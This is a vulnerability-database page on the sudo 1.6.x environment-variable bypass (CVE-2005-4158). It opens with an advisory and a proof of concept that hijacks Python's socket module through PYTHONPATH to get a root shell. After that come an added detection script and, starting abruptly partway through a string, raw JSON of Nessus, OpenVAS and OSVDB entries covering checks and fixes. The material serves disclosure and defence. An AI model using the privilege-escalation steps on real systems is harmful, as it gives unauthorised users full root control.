ID: EDB-ID:27057
Type: exploitdb
Reporter: Breno Silva Pinto
Modified: 2006-01-09T00:00:00
Description
Sudo 1.6.x Environment Variable Handling Security Bypass Vulnerability (2). CVE-2005-4158. Local exploit for linux platform
source: http://www.securityfocus.com/bid/16184/info
Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables.
A local attacker with the ability to run Python scripts can exploit this vulnerability to gain access to an interactive Python prompt. That attacker may then execute arbitrary code with elevated privileges, facilitating the complete compromise of affected computers.
An attacker must have the ability to run Python scripts through Sudo to exploit this vulnerability.
This issue is similar to BID 15394 (Sudo Perl Environment Variable Handling Security Bypass Vulnerability).
## Sudo local root escalation privilege ##
## vuln versions : sudo < 1.6.8p10
## adv : http://www.securityfocus.com/bid/16184
## by breno - breno at kalangolinux dot org
## You need sudo access to execute some python script ##
## First, look at the sudoers file. User 'breno' can execute the expl_python_sudo.py script
breno ~ $ -> cat /etc/sudoers
breno ALL=(ALL) /home/breno/expl_python_sudo.py
## Second, see our simple PoC python script
breno ~ $ -> cat /home/breno/expl_python_sudo.py
#!/usr/bin/python
import sys
import socket
import os
print "Python Sudo Exploit"
exp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
exp.close()
breno ~ $ ->
## Sexy !! Do nothing :)
## Ok. What you need to do to get root is hijack the socket.py module, change the close()
## function to execute something, and change the PYTHONPATH env.
breno ~ $ -> cp /usr/lib/python2.3/socket.py /home/breno/
breno ~ $ -> vi /home/breno/socket.py
...
import os
...
    def close(self):
        os.execl("/bin/sh","/bin/ah");
        self._sock = _closedsocket()
        self.send = self.recv = self.sendto = self.recvfrom = self._sock._dummy
    close.__doc__ = _realsocket.close.__doc__
...
## Ok .. save it and export env
breno ~ $ -> export PYTHONPATH=/home/breno
## .. and execute script. Too much sexy !!!
breno ~ $ -> sudo /home/breno/expl_python_sudo.py
Python Sudo Exploit
root ~ # -> id
uid=0(root) gid=0(root) grupos=0(root)
root ~ # ->
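
The module shadowing shown above can be checked for before a script is run with elevated privilege. The following is an added example, not part of the original advisory or of sudo: it lists the interpreter-affecting variables present in an environment and reports any file on PYTHONPATH that would shadow a module the script imports. The variable list, the function names and the sample script are assumptions made for illustration.

```python
import os
import re
import tempfile

# Variables that change what code a Python interpreter loads or runs.
# Illustrative list for this example, not sudo's own table.
RISKY_PYTHON_VARS = ("PYTHONPATH", "PYTHONHOME", "PYTHONINSPECT")

# Line-based matcher so that Python 2 scripts (print statements) can be read too.
# Limitation: "import a as b, c" only yields "a".
_IMPORT_RE = re.compile(
    r"^\s*(?:import\s+([\w.]+(?:\s*,\s*[\w.]+)*)|from\s+([\w.]+)\s+import\b)"
)

# Constructed sample, modelled on the sudo-permitted script in the write-up.
SAMPLE_SCRIPT = """#!/usr/bin/python
import sys
import socket
import os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.close()
"""


def imported_modules(source):
    """Return the top-level module names a script imports."""
    names = set()
    for line in source.splitlines():
        m = _IMPORT_RE.match(line)
        if not m:
            continue
        parts = m.group(1).split(",") if m.group(1) else [m.group(2)]
        for part in parts:
            top = part.strip().split(".")[0]
            if top:  # skips relative imports such as "from . import x"
                names.add(top)
    return names


def is_untrusted_dir(path):
    """True if the directory is not root-owned or is group/world writable."""
    st = os.stat(path)
    return st.st_uid != 0 or bool(st.st_mode & 0o022)


def audit(script_source, env):
    """Report risky variables and PYTHONPATH files that shadow script imports."""
    findings = []
    for var in RISKY_PYTHON_VARS:
        if var in env:
            findings.append({"kind": "env", "name": var, "value": env[var]})
    wanted = sorted(imported_modules(script_source))
    # PYTHONPATH entries are searched before the standard library, so a
    # same-named file found here is the one the interpreter would import.
    for directory in filter(None, env.get("PYTHONPATH", "").split(os.pathsep)):
        if not os.path.isdir(directory):
            continue
        for name in wanted:
            for rel in (name + ".py", os.path.join(name, "__init__.py")):
                full = os.path.join(directory, rel)
                if os.path.isfile(full):
                    findings.append({
                        "kind": "shadow",
                        "module": name,
                        "path": full,
                        "untrusted_dir": is_untrusted_dir(directory),
                    })
    return findings


def scrubbed_env(env):
    """Return a copy of env with the interpreter-affecting variables removed."""
    return {k: v for k, v in env.items() if k not in RISKY_PYTHON_VARS}


def demo():
    """Audit a constructed environment whose PYTHONPATH holds a same-named module."""
    with tempfile.TemporaryDirectory() as d:
        os.chmod(d, 0o777)  # constructed: a directory anyone can write to
        with open(os.path.join(d, "socket.py"), "w") as fh:
            fh.write("# constructed placeholder, intentionally empty\n")
        env = {"PYTHONPATH": d, "HOME": "/home/user"}  # constructed values
        return audit(SAMPLE_SCRIPT, env)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Running the interpreter with `-E`, which ignores the PYTHON* environment variables, closes the same path from the script's side.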
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:4.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/01/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2006-2019 Canonical, Inc. / NASL script (C) 2006-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(4\\.10|5\\.04|5\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 4.10 / 5.04 / 5.10\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"4.10\", pkgname:\"sudo\", pkgver:\"1.6.7p5-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"sudo\", pkgver:\"1.6.8p5-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"sudo\", pkgver:\"1.6.8p9-2ubuntu2.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:51:30", "description": "Charles Morris discovered a vulnerability in sudo versions prior to\n1.6.8p12 where, when the perl taint flag is off, sudo does not clear\nthe PERLLIB, PERL5LIB, and PERL5OPT environment variables, which could\nallow limited local users to cause a perl script to include and\nexecute arbitrary library files that have the same name as library\nfiles that included by the script.\n\nIn addition, other environment variables have been included in the\npatch that remove similar environment variables that could be used in\npython and ruby, scripts, among others.\n\nThe updated packages have been patched to correct this problem.", "edition": 25, "published": "2006-01-15T00:00:00", "title": "Mandrake Linux Security Advisory : sudo (MDKSA-2005:234)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0151", "CVE-2005-4158"], "modified": "2006-01-15T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:sudo", "cpe:/o:mandrakesoft:mandrake_linux:10.1", "cpe:/o:mandriva:linux:2006", 
"x-cpe:/o:mandrakesoft:mandrake_linux:le2005"], "id": "MANDRAKE_MDKSA-2005-234.NASL", "href": "https://www.tenable.com/plugins/nessus/20465", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2005:234. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20465);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-4158\", \"CVE-2006-0151\");\n script_xref(name:\"MDKSA\", value:\"2005:234\");\n\n script_name(english:\"Mandrake Linux Security Advisory : sudo (MDKSA-2005:234)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandrake Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Charles Morris discovered a vulnerability in sudo versions prior to\n1.6.8p12 where, when the perl taint flag is off, sudo does not clear\nthe PERLLIB, PERL5LIB, and PERL5OPT environment variables, which could\nallow limited local users to cause a perl script to include and\nexecute arbitrary library files that have the same name as library\nfiles that included by the script.\n\nIn addition, other environment variables have been included in the\npatch that remove similar environment variables that could be used in\npython and ruby, scripts, among others.\n\nThe updated packages have been patched to correct this problem.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.sudo.ws/sudo/alerts/perl_env.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo package.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:mandrakesoft:mandrake_linux:le2005\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.1\", reference:\"sudo-1.6.8p1-1.4.101mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK10.2\", reference:\"sudo-1.6.8p1-2.3.102mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK2006.0\", reference:\"sudo-1.6.8p8-2.2.20060mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity 
> 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:51:36", "description": "Previous sudo updates were made available to sanitize certain\nenvironment variables from affecting a sudo call, such as\nPYTHONINSPECT, PERL5OPT, etc. While those updates were effective in\naddressing those specific environment variables, other variables that\nwere not blacklisted were being made available.\n\nDebian addressed this issue by forcing sudo to use a whitelist approach\nin DSA-946-2 by arbitrarily making env_reset the default (as opposed\nto having to be enabled in /etc/sudoers). Mandriva has opted to follow\nthe same approach so now only certain variables are, by default, made\navailable, such as HOME, LOGNAME, SHELL, TERM, DISPLAY, XAUTHORITY,\nXAUTHORIZATION, LANG, LANGUAGE, LC_*, and USER, as well as the SUDO_*\nvariables.\n\nIf other variables are required to be kept, this can be done by\nediting /etc/sudoers and using the env_keep option, such as :\n\nDefaults env_keep='FOO BAR'\n\nAs well, the Corporate 3 packages are now compiled with the\nSECURE_PATH setting.\n\nUpdated packages are patched to address this issue.", "edition": 25, "published": "2006-12-16T00:00:00", "title": "Mandrake Linux Security Advisory : sudo (MDKSA-2006:159)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0151", "CVE-2005-4158"], "modified": "2006-12-16T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:sudo", "cpe:/o:mandriva:linux:2006"], "id": "MANDRAKE_MDKSA-2006-159.NASL", "href": "https://www.tenable.com/plugins/nessus/23903", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2006:159. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(23903);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-4158\", \"CVE-2006-0151\");\n script_xref(name:\"DSA\", value:\"946\");\n script_xref(name:\"MDKSA\", value:\"2006:159\");\n\n script_name(english:\"Mandrake Linux Security Advisory : sudo (MDKSA-2006:159)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandrake Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Previous sudo updates were made available to sanitize certain\nenvironment variables from affecting a sudo call, such as\nPYTHONINSPECT, PERL5OPT, etc. While those updates were effective in\naddressing those specific environment variables, other variables that\nwere not blacklisted were being made available.\n\nDebian addressed this issue by forcing sudo to use a whitelist approach\nin DSA-946-2 by arbitrarily making env_reset the default (as opposed\nto having to be enabled in /etc/sudoers). 
Mandriva has opted to follow\nthe same approach so now only certain variables are, by default, made\navailable, such as HOME, LOGNAME, SHELL, TERM, DISPLAY, XAUTHORITY,\nXAUTHORIZATION, LANG, LANGUAGE, LC_*, and USER, as well as the SUDO_*\nvariables.\n\nIf other variables are required to be kept, this can be done by\nediting /etc/sudoers and using the env_keep option, such as :\n\nDefaults env_keep='FOO BAR'\n\nAs well, the Corporate 3 packages are now compiled with the\nSECURE_PATH setting.\n\nUpdated packages are patched to address this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ 
\"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2006.0\", reference:\"sudo-1.6.8p8-2.3.20060mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T10:03:46", "description": "The former correction to vulnerabilities in the sudo package worked\nfine but were too strict for some environments. Therefore we have\nreviewed the changes again and allowed some environment variables to\ngo back into the privileged execution environment. Hence, this update.\n\nThe configuration option 'env_reset' is now activated by default. It\nwill preserve only the environment variables HOME, LOGNAME, PATH,\nSHELL, TERM, DISPLAY, XAUTHORITY, XAUTHORIZATION, LANG, LANGUAGE,\nLC_*, and USER in addition to the separate SUDO_* variables.\n\nFor completeness please find below the original advisory text :\n\n It has been discovered that sudo, a privileged program, that\n provides limited super user privileges to specific users, passes\n several environment variables to the program that runs with elevated\n privileges. In the case of include paths (e.g. for Perl, Python,\n Ruby or other scripting languages) this can cause arbitrary code to\n be executed as privileged user if the attacker points to a\n manipulated version of a system library.\n\n This update alters the former behaviour of sudo and limits the\n number of supported environment variables to LC_*, LANG, LANGUAGE\n and TERM. 
Additional variables are only passed through when set as\n env_check in /etc/sudoers, which might be required for some scripts\n to continue to work.", "edition": 26, "published": "2006-10-14T00:00:00", "title": "Debian DSA-946-2 : sudo - missing input sanitising", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0151", "CVE-2005-4158"], "modified": "2006-10-14T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:sudo"], "id": "DEBIAN_DSA-946.NASL", "href": "https://www.tenable.com/plugins/nessus/22812", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-946. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22812);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2005-4158\", \"CVE-2006-0151\");\n script_bugtraq_id(16184);\n script_xref(name:\"DSA\", value:\"946\");\n\n script_name(english:\"Debian DSA-946-2 : sudo - missing input sanitising\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The former correction to vulnerabilities in the sudo package worked\nfine but were too strict for some environments. Therefore we have\nreviewed the changes again and allowed some environment variables to\ngo back into the privileged execution environment. Hence, this update.\n\nThe configuration option 'env_reset' is now activated by default. 
It\nwill preserve only the environment variables HOME, LOGNAME, PATH,\nSHELL, TERM, DISPLAY, XAUTHORITY, XAUTHORIZATION, LANG, LANGUAGE,\nLC_*, and USER in addition to the separate SUDO_* variables.\n\nFor completeness please find below the original advisory text :\n\n It has been discovered that sudo, a privileged program, that\n provides limited super user privileges to specific users, passes\n several environment variables to the program that runs with elevated\n privileges. In the case of include paths (e.g. for Perl, Python,\n Ruby or other scripting languages) this can cause arbitrary code to\n be executed as privileged user if the attacker points to a\n manipulated version of a system library.\n\n This update alters the former behaviour of sudo and limits the\n number of supported environment variables to LC_*, LANG, LANGUAGE\n and TERM. Additional variables are only passed through when set as\n env_check in /etc/sudoers, which might be required for some scripts\n to continue to work.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=342948\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-946\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the sudo package. 
For unstable 'Defaults = env_reset' need to\nbe added to /etc/sudoers manually.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.6.6-1.6.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 1.6.8p7-1.4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/10\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"sudo\", reference:\"1.6.6-1.6\")) flag++;\nif (deb_check(release:\"3.1\", 
prefix:\"sudo\", reference:\"1.6.8p7-1.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "cvelist": ["CVE-2006-0151", "CVE-2005-4158"], "edition": 1, "description": "## Vulnerability Description\nSudo contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a user is able to run perl scripts via Sudo, and the perl scripts do not have the taint flag (-T). This flaw may lead to a loss of integrity.\n## Technical Description\nAn attacker may set the PERLLIB, PERL5LIB, and PERL5OPT environment variables to arbitrary paths, and sudo does not filter them and passes them directly to perl. This results in perl looking at these paths for libraries when running a \"use()\", \"require()\", or \"do()\". This issue is very similar to LD_LIBRARY_PATH attacks.\n## Solution Description\nUpgrade to version 1.6.8p12 or higher, as it has been reported to fix this vulnerability. 
An administrator can also apply the following workaround: Add\n'Defaults\tenv_delete+=\"PERLLIB PERL5LIB PERL5OPT\"' to\nthe top of the sudoers file to strip out the offending variables.\n## Short Description\nSudo incorrect environment variable filtering (PERLLIB, PERL5LIB, PERL5OPT)\n## References:\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2006/0010/)\n[Vendor Specific Advisory URL](http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.421822)\nSecurity Tracker: 1015192\n[Secunia Advisory ID:19016](https://secuniaresearch.flexerasoftware.com/advisories/19016/)\n[Secunia Advisory ID:17534](https://secuniaresearch.flexerasoftware.com/advisories/17534/)\n[Secunia Advisory ID:18102](https://secuniaresearch.flexerasoftware.com/advisories/18102/)\n[Secunia Advisory ID:18308](https://secuniaresearch.flexerasoftware.com/advisories/18308/)\n[Secunia Advisory ID:18463](https://secuniaresearch.flexerasoftware.com/advisories/18463/)\n[Secunia Advisory ID:18549](https://secuniaresearch.flexerasoftware.com/advisories/18549/)\n[Secunia Advisory ID:18156](https://secuniaresearch.flexerasoftware.com/advisories/18156/)\n[Secunia Advisory ID:18558](https://secuniaresearch.flexerasoftware.com/advisories/18558/)\n[Secunia Advisory ID:21692](https://secuniaresearch.flexerasoftware.com/advisories/21692/)\n[Secunia Advisory ID:18906](https://secuniaresearch.flexerasoftware.com/advisories/18906/)\nOther Advisory URL: http://wwwnew.mandriva.com/security/advisories?name=MDKSA-2005:234\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2006:159\nOther Advisory URL: http://www.sudo.ws/sudo/alerts/perl_env.html\nOther Advisory URL: http://www.trustix.org/errata/2006/0002/\nOther Advisory URL: http://www.debian.org/security/2006/dsa-946\nOther Advisory URL: http://www.ubuntulinux.org/usn/usn-235-1\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2006_02_sr.html\nISS X-Force ID: 
23102\n[CVE-2005-4158](https://vulners.com/cve/CVE-2005-4158)\n[CVE-2006-0151](https://vulners.com/cve/CVE-2006-0151)\nBugtraq ID: 15394\n", "modified": "2005-11-10T07:17:59", "published": "2005-11-10T07:17:59", "href": "https://vulners.com/osvdb/OSVDB:20764", "id": "OSVDB:20764", "type": "osvdb", "title": "Sudo PERL5OPT Environment Cleaning Multiple Variable Privilege Escalation", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:49:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0151", "CVE-2005-4158"], "description": "The remote host is missing an update to sudo\nannounced via advisory DSA 946-1.\n\nIt has been discovered that sudo, a privileged program, that provides\nlimited super user privileges to specific users, passes several\nenvironment variables to the program that runs with elevated\nprivileges. In the case of include paths (e.g. for Perl, Python, Ruby\nor other scripting languages) this can cause arbitrary code to be\nexecuted as privileged user if the attacker points to a manipulated\nversion of a system library.\n\nThis update alters the former behaviour of sudo and limits the number\nof supported environment variables to LC_*, LANG, LANGUAGE and TERM.\nAdditional variables are only passed through when set as env_check in\n/etc/sudoers, which might be required for some scripts to continue to\nwork.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.6.6-1.5.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:56192", "href": "http://plugins.openvas.org/nasl.php?oid=56192", "type": "openvas", "title": "Debian Security Advisory DSA 946-1 (sudo)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_946_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 946-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright 
(c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 1.6.8p7-1.3.\n\nFor the unstable distribution (sid) this problem has been 